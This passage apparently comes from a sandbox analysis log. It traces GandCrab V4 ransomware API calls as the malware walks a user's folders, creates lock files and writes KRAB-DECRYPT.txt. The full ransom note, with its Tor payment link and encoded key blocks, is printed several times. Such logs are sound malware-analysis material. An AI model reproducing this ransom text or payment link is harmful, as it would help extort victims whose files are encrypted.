flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.304] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0x1f8)) [0098.304] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.304] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.304] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.304] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\d2ca4a08d2ca4dee3d.lock") returned 52 [0098.304] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\sendto\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0098.305] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.305] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\") returned 29 [0098.305] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\*" [0098.305] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\SendTo\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0098.305] CloseHandle (hObject=0x320) returned 1 [0098.306] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0098.306] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0098.306] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0098.306] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu") returned="C:\\Users\\CIiHmnxMn6Ps\\Start Menu" [0098.306] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\" [0098.306] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.306] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.306] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.306] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.306] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.306] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.306] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.306] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\\\KRAB-DECRYPT.txt") returned 50 [0098.306] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\start menu\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0098.307] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0098.307] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0098.308] CloseHandle (hObject=0x320) returned 1 [0098.308] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.308] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.308] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0x1f8)) [0098.308] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.308] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.308] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.309] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\d2ca4a08d2ca4dee3d.lock") returned 56 [0098.309] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\start menu\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0098.320] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.321] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.321] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\") returned 33 [0098.321] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\*" [0098.321] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0098.321] CloseHandle (hObject=0x320) returned 1 [0098.321] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0098.321] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0098.321] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0098.321] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Templates" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates") returned="C:\\Users\\CIiHmnxMn6Ps\\Templates" [0098.321] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Templates\\" [0098.321] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.322] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.322] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.322] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.322] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.322] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.322] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.322] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\\\KRAB-DECRYPT.txt") returned 49 [0098.322] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Templates\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\templates\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0098.323] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0098.323] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0098.324] CloseHandle (hObject=0x320) returned 1 [0098.324] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.324] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.324] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0x208)) [0098.324] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.325] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.325] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.325] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\d2ca4a08d2ca4dee3d.lock") returned 55 [0098.325] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Templates\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\templates\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0098.326] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.326] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Templates\\") returned 32 [0098.326] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Templates\\*" [0098.326] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Templates\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0098.326] CloseHandle (hObject=0x320) returned 1 [0098.326] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0098.326] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0098.327] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0098.327] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Videos" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos" [0098.327] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\" [0098.327] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.327] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.327] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.327] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.327] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.327] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.327] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.327] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\\\KRAB-DECRYPT.txt") returned 46 [0098.328] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0098.328] GetLastError () returned 0x50 [0098.328] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.328] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.328] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0x208)) [0098.328] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, 